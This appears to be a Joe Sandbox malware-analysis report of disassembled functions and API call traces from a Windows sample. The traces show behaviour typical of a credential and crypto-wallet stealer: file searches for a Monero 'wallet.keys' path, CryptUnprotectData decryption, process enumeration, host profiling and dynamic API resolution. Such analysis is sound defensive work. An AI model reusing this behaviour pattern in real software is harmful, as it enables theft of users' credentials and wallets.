Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: e6d94aadfb750f04843b83fb118abad8d9a4613ccc3b4214615f29382cccfa8a
Instruction ID: e34149fb1f124180e0155c67342c5cda915e4328ede732f05645c2ccda4534ea
Opcode Fuzzy Hash: e6d94aadfb750f04843b83fb118abad8d9a4613ccc3b4214615f29382cccfa8a
Instruction Fuzzy Hash: 1B415072950218ABCB25DB94ED99BEEB778FF44700F20419AE40966290DB742F85CFA1

Function 003CE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,003E0D73), ref: 003CE4A2
StrCmpCA.SHLWAPI(?,003E14F8), ref: 003CE4F2
StrCmpCA.SHLWAPI(?,003E14FC), ref: 003CE508
FindNextFileA.KERNEL32(000000FF,?), ref: 003CEBDF

Strings

\*.*, xrefs: 003CE44D

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: 18d2a5560c6a78707666b2b1cbd10da6feae12a0456885b012e6c21fcab98be3
Instruction ID: f89c6fcdd3b9f925996d808dad525326ec298b30eb97fddc4683e2ff6a3b66a3
Opcode Fuzzy Hash: 18d2a5560c6a78707666b2b1cbd10da6feae12a0456885b012e6c21fcab98be3
Instruction Fuzzy Hash: 6C129A339106185BDB16FB70EE96EED7378AF54300F40419AB50A9A291EF306F49DF92

Function 003D9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003D961E
Process32First.KERNEL32(003E0ACA,00000128), ref: 003D9632
Process32Next.KERNEL32(003E0ACA,00000128), ref: 003D9647
StrCmpCA.SHLWAPI(?,00000000), ref: 003D965C
CloseHandle.KERNEL32(003E0ACA), ref: 003D967A

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: d6e0ddd670215724d6625c2ef5007db5d5c732883868a3dd892e61e580958fdf
Instruction ID: e5f108ff7d761bbdc2ec172846ce362a9f0de96021eb836255c34e4cbe44c845
Opcode Fuzzy Hash: d6e0ddd670215724d6625c2ef5007db5d5c732883868a3dd892e61e580958fdf
Instruction Fuzzy Hash: 05010C75A40308ABDB15DFA5DD48BEEB7F9EB48750F10818AA90596380D734DB40CF51

Function 003D7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00E6EF10,00000000,?,003E0E10,00000000,?,00000000,00000000), ref: 003D7A63
RtlAllocateHeap.NTDLL(00000000), ref: 003D7A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00E6EF10,00000000,?,003E0E10,00000000,?,00000000,00000000,?), ref: 003D7A7D
wsprintfA.USER32 ref: 003D7AB7

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: 7f7e7637bce7f6a19408d9063fc070449b1de1e510d55f5e568004c56f6862af
Instruction ID: 560cc999b85ad00f3075003522759a88539d2fcc40bd6e40200ca4cc4f997faf
Opcode Fuzzy Hash: 7f7e7637bce7f6a19408d9063fc070449b1de1e510d55f5e568004c56f6862af
Instruction Fuzzy Hash: B7115EB1A85228EBEB20CB54DC49FAAB778FB04761F10479AE91A933C0D7745A40CF51

Function 003C9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003C9B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 003C9BA3
LocalFree.KERNEL32(?), ref: 003C9BD3

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 538abe82a8912d4f97826fddeaaeeb2b21af19434e97c7161c6f1bbba5418f4e
Instruction ID: 1888ecbf80a1bc72c26c2295c8684eb5d0ef94c6f4c81c2d2da5f9057f083325
Opcode Fuzzy Hash: 538abe82a8912d4f97826fddeaaeeb2b21af19434e97c7161c6f1bbba5418f4e
Instruction Fuzzy Hash: FC11C9B8A00209EFDB05DF94D989EAEB7B5FF88300F104599E915A7350D774AE10CFA1

Function 003D7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003C11B7), ref: 003D7880
RtlAllocateHeap.NTDLL(00000000), ref: 003D7887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 003D789F

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: 5facb396f9baeb0337dddaa057a3546471be5a6f4be2312257fdfa13ca466ee1
Instruction ID: b30a99e798699cc93b33547d62c43cf20ab1b12a40f443273e23e9dd4013f76c
Opcode Fuzzy Hash: 5facb396f9baeb0337dddaa057a3546471be5a6f4be2312257fdfa13ca466ee1
Instruction Fuzzy Hash: CCF04FB2944208ABC700DFD8DD4ABAFBBB8EB04751F10465AFA05A2780C77415048BA1

Function 003C1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 003C116A
ExitProcess.KERNEL32 ref: 003C117E

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: f61e080708d27f48a9950eeceb82dba3230fc2a44c9cbc4332babbc2cf342855
Instruction ID: 0655a85d8a9ed206994c3aa3174b8f3ebdaf735d14dea5c15f3edb15555db34a
Opcode Fuzzy Hash: f61e080708d27f48a9950eeceb82dba3230fc2a44c9cbc4332babbc2cf342855
Instruction Fuzzy Hash: 9AD05E7894030CDBCB00DFE0D849ADEBB79FB08311F001558D90562340EA305881CBA6

Function 003D9C10 Relevance: 254.4, APIs: 112, Strings: 33, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,00E55A10), ref: 003D9C2D
GetProcAddress.KERNEL32(74DD0000,00E558F0), ref: 003D9C45
GetProcAddress.KERNEL32(74DD0000,00E6A9E0), ref: 003D9C5E
GetProcAddress.KERNEL32(74DD0000,00E6A968), ref: 003D9C76
GetProcAddress.KERNEL32(74DD0000,00E6A980), ref: 003D9C8E
GetProcAddress.KERNEL32(74DD0000,00E6AA10), ref: 003D9CA7
GetProcAddress.KERNEL32(74DD0000,00E5C5E8), ref: 003D9CBF
GetProcAddress.KERNEL32(74DD0000,00E6DFD8), ref: 003D9CD7
GetProcAddress.KERNEL32(74DD0000,00E6DF78), ref: 003D9CF0
GetProcAddress.KERNEL32(74DD0000,00E6E1D0), ref: 003D9D08
GetProcAddress.KERNEL32(74DD0000,00E6E110), ref: 003D9D20
GetProcAddress.KERNEL32(74DD0000,00E557F0), ref: 003D9D39
GetProcAddress.KERNEL32(74DD0000,00E55A50), ref: 003D9D51
GetProcAddress.KERNEL32(74DD0000,00E55830), ref: 003D9D69
GetProcAddress.KERNEL32(74DD0000,00E55A70), ref: 003D9D82
GetProcAddress.KERNEL32(74DD0000,00E6E1B8), ref: 003D9D9A
GetProcAddress.KERNEL32(74DD0000,00E6DFA8), ref: 003D9DB2
GetProcAddress.KERNEL32(74DD0000,00E5C980), ref: 003D9DCB
GetProcAddress.KERNEL32(74DD0000,00E55810), ref: 003D9DE3
GetProcAddress.KERNEL32(74DD0000,00E6E1A0), ref: 003D9DFB
GetProcAddress.KERNEL32(74DD0000,00E6E1E8), ref: 003D9E14
GetProcAddress.KERNEL32(74DD0000,00E6E158), ref: 003D9E2C
GetProcAddress.KERNEL32(74DD0000,00E6DF30), ref: 003D9E44
GetProcAddress.KERNEL32(74DD0000,00E556F0), ref: 003D9E5D
GetProcAddress.KERNEL32(74DD0000,00E6E0F8), ref: 003D9E75
GetProcAddress.KERNEL32(74DD0000,00E6E200), ref: 003D9E8D
GetProcAddress.KERNEL32(74DD0000,00E6DF90), ref: 003D9EA6
GetProcAddress.KERNEL32(74DD0000,00E6E218), ref: 003D9EBE
GetProcAddress.KERNEL32(74DD0000,00E6DFC0), ref: 003D9ED6
GetProcAddress.KERNEL32(74DD0000,00E6E170), ref: 003D9EEF
GetProcAddress.KERNEL32(74DD0000,00E6E140), ref: 003D9F07
GetProcAddress.KERNEL32(74DD0000,00E6DF48), ref: 003D9F1F
GetProcAddress.KERNEL32(74DD0000,00E6E098), ref: 003D9F38
GetProcAddress.KERNEL32(74DD0000,00E6B818), ref: 003D9F50
GetProcAddress.KERNEL32(74DD0000,00E6E188), ref: 003D9F68
GetProcAddress.KERNEL32(74DD0000,00E6DF60), ref: 003D9F81
GetProcAddress.KERNEL32(74DD0000,00E55A90), ref: 003D9F99
GetProcAddress.KERNEL32(74DD0000,00E6E080), ref: 003D9FB1
GetProcAddress.KERNEL32(74DD0000,00E55850), ref: 003D9FCA
GetProcAddress.KERNEL32(74DD0000,00E6DFF0), ref: 003D9FE2
